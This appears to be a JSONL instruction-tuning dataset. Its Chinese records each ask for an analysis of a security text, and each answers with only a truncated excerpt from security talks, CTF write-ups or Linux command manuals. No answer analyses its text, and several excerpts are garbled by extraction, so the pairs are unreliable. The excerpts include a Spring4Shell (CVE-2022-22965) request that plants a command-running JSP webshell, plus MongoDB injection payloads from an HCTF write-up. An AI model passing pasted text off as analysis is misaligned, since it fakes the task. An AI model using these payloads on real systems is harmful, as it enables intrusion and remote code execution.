{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n智能合约安全开发 Ali0th Email martin2877@foxmail.com 智能合约安全开发 1. 相关概念 2. 安全事件 3. 审计之路 4. 常见漏洞 5. 常用工具 智能合约 智能合约Smart Contract是以太坊中最为重要的一个概念即以计 算机程序的方式来缔结和运行各种合约最早在上世纪 90 年代Nick Szabo 等人就提出过类似的概念但一直依赖因为缺乏可靠执行智能合约的 环境而被作为一种理论设计区块链技术的出现恰好补充了这一缺陷 以太坊支持通过图灵完备的高级语言包括 SoliditySerpentViper 等来开发智能合约智能合约作为运行在以太坊虚拟机Ethereum Virual MachineEVM中的应用可以接受来自外部的交易请求和事件通过触 发运行提前编写好的代码逻辑进一步生成新的交易和事件可以进一步调 用其它智能合约 智能合约 智能合约 智能合约 Smart Contract 智能合约 DApp 安全事件 The DAO 漏洞 以太坊短地址漏洞 wallet contract奇偶校验破解 Parity多重签名钱包提款漏洞 HTTP RPC API 漏洞 Parity多重签名钱包合约漏洞 以太坊编程语言Solidity漏洞 智能合约Fallback函数 智能合约递归调用recursive 调用深度限制call depth 太阳风暴 以太坊浏览器 Mist 区块节点漏洞 日食攻击eclipse attack Geth客户端DoS攻击漏洞 浪子合约漏洞 自杀合约漏洞 贪婪合约漏洞 遗嘱合约漏洞 交易顺序依赖性 时间戳依赖性 挖矿中心化 BEC/SMT 智能合约无限转币漏洞 审计之路 如何从零上手新的代码语言进行审计 审计之路 如何从零上手新的代码语言进行审计 常规开发过程->基本语法->深入语法->漏洞类型->工具利用->开始审计 弯道超车语法->漏洞类型->文本直接审计 审计之路 如何从零上手新的代码语言进行审计 常规开发过程->基本语法->深入语法->漏洞类型->工具利用->开始审计 Remix-ide Pet-shop DASP Ethereum Smart Contract Best Practices Solidity 常见漏洞 - Arithmetic Issues 计算问题 - Integer Overflow 整形上溢 - integer underflow 整形下溢 - Race Condition 条件竞争 - Re-Entrancy 可重入性 (同函数条件竞争) - Cross-function Race Conditions 跨函数条件竞争 - Carelessness 粗心 - Missing Constructor 构造函数缺失 - Wrong Interface 错误接口 - Code Logic Issues 代码逻辑问题 - Unchecked External-Call 未经核查的外部调用 - Unprotected Function 未受保护函数 - Use tx.origin for authorization 使用tx.origin做认证 - Time manipulation 时间操纵 - Timestamp Dependence 时间戳依赖 - Access Control 访问控制 - delegatecall 使用delegatecall - Bad Randomness 随机数问题 - Using block variables 使用区块变量 - Blockhash 使用区块哈希值 - Private Seed 使用私有种子 - front-running 抢先交易 - Forcibly Sending Ether to a Contract 强制向合约转账 - Denial of Service 拒绝服务 - DoS with (Unexpected) revert 恢复交易拒绝服务 - DoS with Block Gas Limit Gas耗尽拒绝服务 - unexpected throw 意外报错 - unexpected kill 意外自杀 - access control breached 突破访问控制 - Front Running 抢先交易 - time-of-check vs time-of-use (TOCTOU) - race condition - transaction ordering dependence (TOD) - Short Address Attack 短地址漏洞 常见漏洞 Fallback 1 无参数不返回值 2 无匹配函数或data无内容时被调用 3 合约接受Ether时被调用需要payab", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTsung Pei Kan peikan@gmail.com 1  Graduated from Central Police University . He likes to study about Kernel and Reverse Engineering. He is interested in the subject of Computer Forensic. Hes working for National Police Agency now. Besides, he is also the docent for Taiwan Network Information Center.  At the beginning of last year he developed a scanner based on behavioral analysis call \"NPASCAN\", it can detect and exam the unknown malware very quickly. The most important thing is you can free download from the NPA website.  Special skills:  Windows System Programming  Malicious Software Analysis  Software Reversing  Computer Forensics  Experience  National Police Agency (NPA)  Information Department  Criminal Investigation Bureau (CIB)  High-Tech Crime Investigation Center  Information Department 2  Foxy is a Chinese P2P software which is popular in Taiwan, China,Hong Kong and Macau.  It is based on the Gnutella and G2 architecture. 3 Data leaked into Foxy P2P network(TW) 4 Data leaked into Foxy P2P network(TW) 5 6 7 8 9  Although they have different UI, these clients join to the same P2P network.  Do not think that you did not install foxy, so your data will be safe. 10 11 11 Adsl dial Id/Password 12 Sharing nodes cant be seen in an easy way. The file will be shared immediately after downloading. Limited software function Only Foxy can join to the Foxy network 13 Connect to Foxy Search from Foxy Download from foxy 14 GWebCaches 15 16  GNUTELLA CONNECT/0.6  Listen-IP: 61.57.116.229:24499  Remote-IP: 203.185.52.200  User-Agent: Foxy 1.8.6.0  Accept: application/x-gnutella2  X-Ultrapeer: False  Accept-Encoding: deflate  X-Auth-Challenge: KxElu1Q 17  GNUTELLA/0.6 200 OK  Listen-IP: 203.185.52.200:7952  Remote-IP: 61.57.116.229  User-Agent: Foxy 1.9.10.0  Content-Type: application/x-gnutella2  Accept: application/x-gnutella2  X-Ultrapeer: True  Accept-Encoding: deflate  X-Auth-Response: RhXb6zC5Yss  X-Auth-Challenge: 3H5HtDHD  X-Try-Hubs: 219.78.62.158:10686 2010-10- 03", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCool stuff learned from the Department of Defense Cyber Crime Digital Forensic Challenge (2006) David C. Smith, CISSP CISM Georgetown University with contributions from Mike McDonanld, The Professionals (3rd Place Team, Florida State University) A little bit about me..  Information Security Professional, in IT over 18 years, mostly as a consultant in some capacity.  Work at GU, have a small consulting company  HCP Forensic Services http://www.hcp-fs.com  B.S. Computer Science, working toward my masters in IA. Team Hoya Haxa!  DC3 limits the teams to 4.  Mickey Lasky, Sr. Security Analyst  Trent Beckett, Security Analyst  Jon Hesson, Security Intern  David Smith  Almost all off-hours, team lunches on me.  Most of us have 2+ years of digital forensic work & investigations.  We thought it would be cool to learn something new & develop existing skillz.  Hoya Haxa? DC3 Challenge  DC3 = Department of Defense Cyber Crime Center  Defense Cyber Crime Institute  Defense Computer Forensics Laboratory  Defense Cyber Investigations Training Academy  RDT&E  Research, Development, Testing, and Evaluation.  This challenge  Cheap R&D?  We heard about this challenge from a Slashdot article and a follow-up in Network World. DC3 Challenge (now called the 2006 Challenge)  Quick breakdown of the competitors  Academic, 61 entries.  Civilian, 25 entries.  Commercial, 21 entries.  Government, 7 entries.  Military, 6 entries.  Countries represented  US, Australia, Canada, France, India.  Total teams 140  Prize is all expense paid trip to DC3 Conference + bragging rights! DC3 Challenge  01 August 2006: Registration Began.  01 September 2006: Challenges Sent.  01 December 2006: Last Day to Submit.  15 December 2006: Winning Team Announced.  21-26 January 2007: DoD Cyber Crime Conference (Prize).  So, basically we got 3 months to knock these challenges out! Rules of Engagement  After the challenge registrations ballooned to 140, DC3 changes the rules to the first 100 submitted solutions are eli", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nuucico === UUCP文件传输服务程序 ## 补充说明 **uucico命令** 命令UUCP文件传输服务程序 uucico是用来处理uucp或uux送到队列的文件传输工具uucico有两种工作模式主动模式和附属模式当在主动模式下时uucico会调用远端主机在附属模式下时uucico则接受远端主机的调用 ### 语法 ```shell uucico [-cCDefqvwz][-i<类型>][-I<文件>][-p<连接端口号码>][-][-rl][-s<主机>][-S<主机>][-u<用户>][-x<类型>][--help] ``` ### 选项 ```shell -c或--quiet 当不执行任何工作时不要更改记录文件的内容及更新目前的状态 -C或--ifwork 当有工作要执行时才调用-s或-S参数所指定主机 -D或--nodetach 不要与控制终端机离线 -e或--loop 在附属模式下执行并且出现要求登入的提示画面 -f或--force 当执行错误时不等待任何时间即重新调用主机 -i<类型>或--stdin<类型> 当使用到标准输入设备时指定连接端口的类型 -I<文件>--config<文件> 指定使用的配置文件 -l或--prompt 出现要求登入的提示画面 -p<连接端口号码>或-port<连接端口号码> 指定连接端口号码 -q或--quiet 不要启动uuxqt服务程序 -r0或--slave 以附属模式启动 -s<主机>或--system<主机> 调用指定的主机 -u<用户>或--login<用户> 指定登入的用户帐号而不允许输入任意的登入帐号 -v或--version 显示版本信息并且结束程序 -w或--wait 在主动模式下当执行调用动作时则出现要求登入的提示画面 -x<类型>或-X<类型>或outgoing-debug<类型> 启动指定的排错模式 -z或--try-next 当执行不成功时尝试下一个选择而不结束程序 --help 显示帮助并且结束程序 ``` ### 实例 使用主动模式启动uucico服务在命令提示符下直接输入如下命令 ```shell uucico-r1 ``` 提示该命令一般没有输出", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Secure Logon Web Exploitation, 500 points ## Description: > Uh oh, the login page is more secure... I think. ```python from flask import Flask, render_template, request, url_for, redirect, make_response, flash import json from hashlib import md5 from base64 import b64decode from base64 import b64encode from Crypto import Random from Crypto.Cipher import AES app = Flask(__name__) app.secret_key = 'seed removed' flag_value = 'flag removed' BLOCK_SIZE = 16 # Bytes pad = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * \\ chr(BLOCK_SIZE - len(s) % BLOCK_SIZE) unpad = lambda s: s[:-ord(s[len(s) - 1:])] @app.route(\"/\") def main(): return render_template('index.html') @app.route('/login', methods=['GET', 'POST']) def login(): if request.form['user'] == 'admin': message = \"I'm sorry the admin password is super secure. You're not getting in that way.\" category = 'danger' flash(message, category) return render_template('index.html') resp = make_response(redirect(\"/flag\")) cookie = {} cookie['password'] = request.form['password'] cookie['username'] = request.form['user'] cookie['admin'] = 0 print(cookie) cookie_data = json.dumps(cookie, sort_keys=True) encrypted = AESCipher(app.secret_key).encrypt(cookie_data) print(encrypted) resp.set_cookie('cookie', encrypted) return resp @app.route('/logout') def logout(): resp = make_response(redirect(\"/\")) resp.set_cookie('cookie', '', expires=0) return resp @app.route('/flag', methods=['GET']) def flag(): try: encrypted = request.cookies['cookie'] except KeyError: flash(\"Error: Please log-in again.\") return redirect(url_for('main')) data = AESCipher(app.secret_key).decrypt(encrypted) data = json.loads(data) try: check = data['admin'] except KeyError: check = 0 if check == 1: return render_template('flag.html', value=flag_value) flash(\"Success: You logged in! Not sure you'll be able to see the flag though.\", \"success\") return render_template('not-flag.html', cookie=data) class AESCipher: \"\"\" Usage: c = AESCipher('password').encrypt('m", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nFuzzing'Android'OMX Mingjian Zhou'and'Chiachih Wu C0RE'Team About'Us  Mingjian Zhou,'周明建  Security'researcher'@'360'C0RE'team  Focused'on'Android'vulnerability'research'and'exploit' development  Chiachih Wu,'吳家志 (@chiachih_wu)  Security'researcher'@'360'C0RE'team  Android/Linuxsystem'security'research  C0RE'team'(c0reteam.org)'founding'member  C0RE'Team  A'security-focused'group'started'in'mid-2015  With'a'recent'focus'on'the'Android/Linux'platform,'the'team' aims'to'discover'zero-day'vulnerabilities,'develop'proof-of- concept'exploits,'and'explore'possible'defenses Agenda  Introduction  Fuzzing'Android'OMX  Confirmed'Vulnerabilities  Patterns'of'OMX'Vulnerabilities INTRODUCTION About'OMX What'is'OMX'(1/2)  Open'Media'Acceleration,'aka'Open'MAX,' often'shortened'as'OMX  WIKI:%a'non-proprietary'and'royalty-free'cross- platform set'of C-language programming< interfaces that'provides'abstractions'for' routines'especially'useful'for'audio,<video,< and<still<images<processing. What'is'OMX'(2/2) OMX'in'Android'(1/2)  OMX'Integration'Layer'(IL)  provides'a'standardized'way'for'Stagefright to' recognize'and'use'custom'hardware-based' multimedia<codecs<called<components.  Vendors'provide'the'OMX<plugin<which'links' custom'codec'components'to'Stagefright.  Custom'codecs'must be'implemented' according'to'the'OMX'IL'component'standard. OMX'in'Android'(2/2) Stagefright Video'OMX' Component Audio'OMX' Component Media'Player'Service Video'Drivers Audio'Drivers OMX<IL Kernel MediaServer Soft A/V'Codecs Music User'APPs MMS  Binder'IPC IOCTL Binder OMX'Codecs  Android'provides'built-in'software'codecs'for' common'media'formats  Vendors'codecs Built-in'Soft'Codecs'Example Vendor'Codecs'Example Why'OMX?  Exposed'via'multiple'attack'vectors  Media'native'codes'are'often'vulnerable FUZZING<ANDROID<OMX Attack'Surface'&'Flow The'Attack'Surface'(1/2) Stagefright Video'OMX' Component Audio'OMX' Component Media'Player'Service Video'Drivers Audio'Drivers OMX<IL Kernel MediaServer Soft A/V'Code", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMultipot: A More Potent Variant of Evil Twin K. N. Gopinath Senior Wireless Security Researcher and Senior Engineering Manager AirTight Networks This presentation pertains to a discovery of a more potent variant of Evil Twin. We call it Multipot. What is unique about Multipot is that the prevalent defenses against Evil Twin, in particular deauth based session containment, are totally ineffective against the Multipot. Multipot threat can occur naturally in enterprise and campus network environments or it can be presented by attacker with deliberate malicious intent. A demonstration of Multipot threat will be provided at the end of the presentation. Multipot provides a glimpse into complexities of evolving wireless vulnerabilities and their countermeasures [1,2]. Multipot: What It Is and How It Works Multipot is a newly discovered threat scenario consisting of multiple APs which are configured with the same SSID and lure WiFi clients into connecting to them. The term Multipot is derived from multiple and honeypot. Multipot can occur naturally in the form of multiple Municipal APs or Metro APs around the victim client, all of which are naturally configured for the same SSID (e.g., GoogleWiFi). A client which has such an SSID in its WiFi profile can connect to such a Multipot. Another example of naturally occurring Multipot is multiple APs in the neighbors corporate network around the victim client, which again are naturally configured with the same SSID. Neighboring networks which are open (i.e., do not use cryptographic security) and/or use manufacturer default SSIDs are good candidates for this type of Multipot. Wireless connections of corporate or campus clients to such naturally occurring Multipots can lead to non-policy compliant communication. There can also be a handcrafted or malicious version of Multipot where an attacker can combine it with known Evil Twin attack tools (see references 3 to 8). Each of these APs in a handcrafted Multipot feeds data into a comm", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWindows 安全 - 服务篇2 0x00 前言 上一篇主要是Windows服务的基础架构这一篇主要记录服务账户账户和安全的关系非常紧密熟练 掌握服务账户的知识对理解很多服务相关的安全问题是非常重要的 服务账户涉及的知识非常多除了基础的4类Local SystemNetwork ServiceLocal Service Service Account以外还有服务隔离虚拟服务账户交互式服务检测Session 0隔离 0x01 服务账户 在早期的windows系统中服务是运行在本地系统账户权限下的例如SYSTEMLocalSystem这个 权限是非常大的后面慢慢出现了网络服务账户和本地服务账户它们的权限就相对低了很多 本地系统账户 Windows用户模式下的核心组件也运行在本地系统账户下例如Session管理Smss.exe Windows子系统进程Csrss.exe本地安全认证进程Lsass.exe登录进程Winlogon.exe 这个账户权限是非常高的有以下特性 是本地管理员组成员具体看下文中的服务账户的组关系表 具有所有权限具体情况看服务账户的权限分配情况表 能够访问大部分文件和注册表 默认用户profile位于HKU\\.DEFAULT 如果是域中的电脑本地系统账户包含了机器SID因此同森林下的运行在本地管理账户下的服务 认证别的机器将使用机器账户 除非机器账户本限制否则服务进程能够使用空sessions也就是无认证访问网络资源当然你 也可以使用注册表HKLM\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters来执 行分享和管道使用空sessions(NullSessionPopesNullSessionShares) 网络服务账户 网络服务账户顾名思义是服务想通过认证别的机器所使用的账户网络服务账户相对于本地系统账 户权限就低了很多并不属于管理员组对注册表和文件的访问权限也低了很多不能用来加载驱动 和打开任意进程网络服务账户的用户profile位于HKU\\S-1-5-20相关的文件在目 录%systemRoot%\\ServiceProfiles\\NetworkService中比较常见的运行在网络服务账户下面的服务 有DNS client 说到这儿你有没有想到土豆提权系列服务账户和土豆提权系列有很大的关系这也是为什么我先写 windows服务的基础知识后面会接着写土豆提权系列的原因 本地服务账户 本地服务账户和本地网络账户本质上是相同的唯一的不同是关于网络访问这块儿网络服务账户可以 匿名访问网络资源而本地服务账户不行本地服务账户的用户Profile位于HKU\\S-1-5-19并且文件目 录位%SystemRoot%\\ServiceProfiles\\LocalService. 比较常见的运行在本地服务账户下的服务有远程注册表服务LmHosts服务 Produced by AttackTeamFamily - Author: L.N. - Date: 2022-04-17 No. 1 / 4 - Welcome to www.red-team.cn Local System Network Service Local Service Service Account Administrators Everyone Everyone Everyone Everyone Users Users Users Authenticated Users Authenticated Users Authenticated Users Authenticated Users Local Local Local Network service Local service Local service Console logon Console logon All Services UWP capabilities groups Write restricted Console logon 系统 系统 系统 高 在上文中都提到了用户Profile应该很多同学不清楚它是干什么的为什么特地的指出不同账户的用户 profile想了解的同学可以阅读https://docs.microsoft.com/en-us/previous-versions/windows/deskt op/legacy/bb776892(v=vs.85)后面我也会单独拿出来写除此上文中还例举了一些使用某服务账户的 默认服务这个也是非常重要的你仔细看下文权限表中的权限分配SeImpersonatePrivilege服务相 关账户都具备这个权限这也是土豆提权的前置条件之一而这些默认服务启动的进程必然是具备这个 权限的所以梳理", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHCTF Writeup 队伍名Albertchang Web 部分 Injection 看了下 cookie发现 base64解密 看了好久没看得明白主办方放了 Hint是 Xpath 注入百度之在文库发现了一篇文章 测试了下 发现有回显 谷歌找到了一篇文章经过尝试最终构造出 payload confused question 右键源码发现 login.php.txt 提交一次我们可以发现 而 parse_str 这一个函数会对内容进行两次 url 编解码 大致意思是让我们绕过其中癿函数以 admin 身份迚行提交 pasword也就是我们只要是 admin 身份就可以而 password 则丌需要迚行什么绕过丌知道想癿对丌对可是实际上 这样执行是可以返回 flag 癿 Payload 截图如下 MMD队友跑出去睡觉去了我是代写的 payload 是我按照他说的自己编写的管理理 解意思就好题目名M(妈)M(妈)D(的) Mangodb 癿数据库注入点在 password 哪里在 wooyun 上找到一篇文章 http://drops.wooyun.org/tips/3939  其 中 有 一 段 关 于 mangodb 癿 注 入  之后按照这个构造 payload name=0'||((tojson(db.getCollectionNames())>='a'))||'&password=1 盲注引号中间癿部分 得到这 样癿构造name=a'||((tojson(db.getCollectionNames())>='[ \"HCTF\", \"login\", \"system.indexes\" ]'))||'&password=1得到 name=a'||((tojson(db.getCollectionNames())>='[ \"HCTF\", \"login\", \"system.indexes\" ]'))||'&password=1 同样构造去读取 HCTF 下癿数据这块是根据 本地测试癿方式得到如果 db.test.find()[0][]红色部分如果读取到癿列丌存在则数据为 undefined如果存在正常返回正常数据所以测试红色部分首先测试癿是 flag发现 存在之后测试别癿发现 id 存在之后尝试读取 flag 数据库同样构造 name=0'||(((tojson(db.HCTF.find()[0]['flag']))>=' '))||'&password=1同样 修改红色部分得到 flag注意爆癿时候第一位是空格 FlagHCTF{h4ck_m0ng0db_2_3_1} 管理大哥队友说他是纯手动测试癿,中间有跳步猜出来一部分数据基本上爆出来两三 个就可以根据规律推出几位并没有写脚本所以我也是就没有附上脚本有问题 直接发邮箱吧 Xxxxx 就是 25 分哪个 忘记题目叫啥了就是一个 I 和 L 癿跳转filddler 戒者 burp 抓包就好了 在 http 头发现 flag flag: hctf{w3lcome_t0_hc7f_f4f4f4} fuck === 传参数a 和 b三个等号直接[]数组绕过直接得到 flag http://120.26.93.115:18476/eff52083c4d43ad45cc8d6cd17ba13a1/index.ph p?a[]=s878926199a&b[]=s155964671a Flag: hctf{dd0g_fjdks4r3wrkq7jl} Personal blog 发现一篇日志写着 尝试找 源码在目录下没有发现备份癿代码发现代码托管在 github 上尝试在 github 上 搜索 LoRexxar得到找到源码得到 flag 解 base64 得到 flag hctf{H3xo_B1og_Is_Niu8i_B1og} Hack my net 神奇的 css 问题之前在纠结半天哪个什么.css proxy 什么鬼然后中 午发现利用@可以跨域读取 css 文件猜测是读取 这个配置文件之后还是没找到思路晚上 的时候在 google 上查到 css 的某一种验证是利用 http 头的 验证 再加上之前发现的 conf 文件构造 Location 重 定向到这个文件尝试读取在 vps 上构造  之前构造几次都没有加/css 的 http 头之后加上之后成功得到 flag flag:hctf{302_IS_GOOD_TO_SSRF} Server is done 随便提交一些东西发现在源码存在提示流密码.百度知道流密码最常用癿是 RC4所 以构造 RC4 异戒读取 flag 长度为 515所以提交 515 个 1提取 message 中癿信息为 key 和 1 异戒癿结果之后用 key 和 ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Spring Framework RCE via Data Binding on JDK 9+ (CVE-2022-22965) A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it. References: - <https://tanzu.vmware.com/security/cve-2022-22965> - <https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/> ## Vulnerability Environment Execute the following command to start a server that uses Spring WebMVC 5.3.17: ``` docker compose up -d ``` After server is started, browse the `http://your-ip:8080/?name=Bob&age=25` to see an example page. ## Vulnerability Reproduce Send the following request to change the logging configuration in Apache Tomcat and write the log as a JSP file: ``` GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat= HTTP/1.1 Host: localhost:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 C", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n## tcache makes heap exploitation easy again ### 0x01 Tcache overview 在 tcache 中新增了两个结构体分别是 tcache_entry 和 tcache_perthread_struct ```C /* We overlay this structure on the user-data portion of a chunk when the chunk is stored in the per-thread cache. */ typedef struct tcache_entry { struct tcache_entry *next; } tcache_entry; /* There is one of these for each thread, which contains the per-thread cache (hence \"tcache_perthread_struct\"). Keeping overall size low is mildly important. Note that COUNTS and ENTRIES are redundant (we could have just counted the linked list each time), this is for performance reasons. */ typedef struct tcache_perthread_struct { char counts[TCACHE_MAX_BINS]; tcache_entry *entries[TCACHE_MAX_BINS]; } tcache_perthread_struct; static __thread tcache_perthread_struct *tcache = NULL; ``` 其中有两个重要的函数 `tcache_get()` 和 `tcache_put()`: ```C static void tcache_put (mchunkptr chunk, size_t tc_idx) { tcache_entry *e = (tcache_entry *) chunk2mem (chunk); assert (tc_idx < TCACHE_MAX_BINS); e->next = tcache->entries[tc_idx]; tcache->entries[tc_idx] = e; ++(tcache->counts[tc_idx]); } static void * tcache_get (size_t tc_idx) { tcache_entry *e = tcache->entries[tc_idx]; assert (tc_idx < TCACHE_MAX_BINS); assert (tcache->entries[tc_idx] > 0); tcache->entries[tc_idx] = e->next; --(tcache->counts[tc_idx]); return (void *) e; } ``` 这两个函数会在函数 [_int_free](https://sourceware.org/git/gitweb.cgi?p=glibc.git;a=blob;f=malloc/malloc.c;h=2527e2504761744df2bdb1abdc02d936ff907ad2;hb=d5c3fafc4307c9b7a4c7d5cb381fcdbfad340bcc#l4173) 和 [__libc_malloc](https://sourceware.org/git/gitweb.cgi?p=glibc.git;a=blob;f=malloc/malloc.c;h=2527e2504761744df2bdb1abdc02d936ff907ad2;hb=d5c3fafc4307c9b7a4c7d5cb381fcdbfad340bcc#l3051) 的开头被调用其中 `tcache_put` 当所请求的分配大小不大于`0x408`并且当给定大小的 tcache bin 未满时调用一个tcache bin中的最大块数`mp_.tcache_count`是`7` ```c /* This is another arbitrary limit, which tunables can change. Each tcache bin will hold at most this number of chunks. */ # define TCACHE_FILL_COUNT 7 #e", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDigital Active Digital Active Self Defense Self Defense DEFCON 12 DEFCON 12 OUDOT Laurent OUDOT Laurent oudot oudot@ @rstack rstack.org .org http://www. http://www.rstack rstack.org/ .org/oudot oudot// Some references  Defending your right to defend: Considerations of an automated strike-back technology  Timothy M. Mullen  Launch on Warning: Aggressive Defense of Computer Systems  Curtis E.A. Karnow  Enforcer, Automated Worm Mitigation for private networks  BlackHat Seattle, February 2003, Timothy M.Mullen, AnchorIS.com  Vigilantes on the net  Barbara Moran, NewScientist, 12 june 2004  Symbiot, Adaptive Platform for Network Security  http://www.symbiot.com  Active Defense research project, Dittrich  http://staff.washington.edu/dittrich/ad/ Summary  Introduction  Current threats and limitations  Active Defense  Warning  Legal Issues  Technical considerations  Requirements  Honeypots  Internal computers  Internal threats  Examples  Technical limitations  Conclusions Introduction  Current threats  Known limitations for defense technologies  Many solutions in the information security field  Laws fail for certain kind of activities  Natural temptation  Fighting back attackers, counterstrike  Not so many solutions that use active countermeasure capabilities  Interesting field of research and development ? The digital threats  Though we use more and more security technologies, there are still security problems  Confidentiality, Integrity, Availability, Copyright, etc  Information Assurance  External threats  Firewall, Proxies, Hardened services  Ethical Hackers, Corporate spies, Cyber terrorists...  Internal threats : easier/faster access  Authentication, In-depth Protection...  Trainees, Outsourcing, Employees From hardening to reaction  A lot of technologies might be used to block evil traffic  Routers, Firewalls, proxies, etc  Allow the minimum that is needed  But aggressors still find solutions like :  Bouncing in (bad security rules, bugs, etc)  Getting an access insi", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nN Stage Authentication with Biometric Devices Presented by: Nate Rotschafer Sophomore Peter Kiewit Institute Revised: July 8, 2002 N Stage Authentication  Outline  Background on Authentication  General Network Security  Need for High Grade Authentication  Need for Multiple Factor Authentication  Background on Error Types  Forms of Biometric Authentication  Pros and Cons of Each Biometric Technology  Whats Hot? Whats Not?  Major Players  Network Management with Biometric Devices  Problems  Proper Network Security with Biometric Devices  Demos and Discussion  Prognosis Background on Authentication Identification  The method used by a system (not necessarily a computer) to uniquely identify an individual or group. Examples: User names, Drivers License, School ID, Security Badge, Passport Authentication  The method(s) used to verify the given identification against a database of known information. Examples: Passwords, Fingerprints, Iris Prints, Negotiation Development of Authentication  What you know  What you have  What you are  Future Development: How you are... General Network Security Security is NOT  Installing a firewall  A product or Service  Running an audit and shutting things off Security IS  Working productively and without interruptions  Only as good as the weakest link  Risk management of resources (equipment, people)  Physical security  A process, methodology, policies and people  Is 24x7x365 General Network Security  No silver bullet to network security  Replay attacks  Denial of Service ((D)DoS)  Spoofing  Users  Dictionary Attacks Security Thoughts  80-90% are internal issues  Hard drive crash (what did you loose, and how long to get back up?)  Firewall penetration (what can they do, what do they see?)  Internet failed (how much lost productivity/revenue, backup net connection?)  Some can always get in General Network Security Conclusion  Biometrics will help but will not solve all problems  Users are the weakest link  Proactive security plan Need for H", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nblockdev === 从命令行调用区块设备控制程序 ## 补充说明 **blockdev命令** 在命令调用ioxtls函数以实现对设备的控制 ### 语法 ```shell blockdev(选项)(参数) ``` 选项 ```shell -V打印版本号并退出 -q安静模式 -v详细信息模式 --setro只读 --setrw只写 --getro打印只读状态1表示只读0表示非只读 --getss打印扇区大小通常为521 --flushbufs刷新缓冲区 --rereadpt重新读取分区表 ``` ### 参数 设备文件名指定要操作的磁盘的设备文件名 ### 实例 设置设备为只读 ```shell blockdev --setro /dev/hda4 ``` 读取设备是否为只读 ```shell blockdev --getro /dev/hda4 ``` 设置设别为可读写 ```shell blockdev --setrw /dev/hda4 ```", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMalicious Code & wireless networks By: Brett Neilson 7/13/2002 Slide 2 Defcon 11 Overview  Wireless technology, networks & devices  Defining wireless threats  Why malicious code will spread on wireless networks  Economic impact & potential damages  Protecting against malicious threats Wireless technology & networks 7/13/2002 Slide 4 Defcon 11 What is wireless?  Merriam Webster says:  Wireless: adjective 1: Having no wire or wires  Basic Components of a wireless system  Antenna  The conduit of sorts  Transmitter  Sends the RF  Receiver  Receives the RF 7/13/2002 Slide 5 Defcon 11 So who is using it?  Everybody  TV / Radio / Satellite  Police / Fire / EMS  Cell Phones / Pagers  Building access cards  Automatic Toll Collection (Toll Tags) 7/13/2002 Slide 6 Defcon 11 Mobile Data Terminals (MDT)  Very popular with Police and Fire  Allows instant access to dispatcher data  More secure???  Up until recently legal to monitor  New features include  Live video monitoring 7/13/2002 Slide 7 Defcon 11 Cellular Technologies 3G (Third Generation)  2002 and beyond (In progress)  Data speeds (144+Kbps)  Video and Audio 2.5G (Not quite 3G)  2001 to present  Digital / PCS Services  Data speeds (56Kbps)  Email messaging 2G (Second Generation)  1995 to present  Digital / PCS Services  Data speeds (9.6  19Kbps)  Text messaging 1G (First Generation)  1983 to present  Analog cellular service  Voice only 7/13/2002 Slide 8 Defcon 11 802.11 Networks 802.11g 20 Mbps 2.4 Ghz 802.11b 11 Mbps 2.4 GHz 802.11a 54 Mbps 5.15-5 GHz 802.11 1 to 2 Mbps 2.4 GHz 7/13/2002 Slide 9 Defcon 11 Wireless Devices  PDA  Palm & iPAQ  Strong Growth in 2000  Slowly shrinking thereafter  Renewed interest due to advances  New suppliers entering the market  Converged Devices  PDA & Phone combined into one  All the features w/ all the connectivity  Designed for size not security  Wireless (Security) Cameras  RFID devices 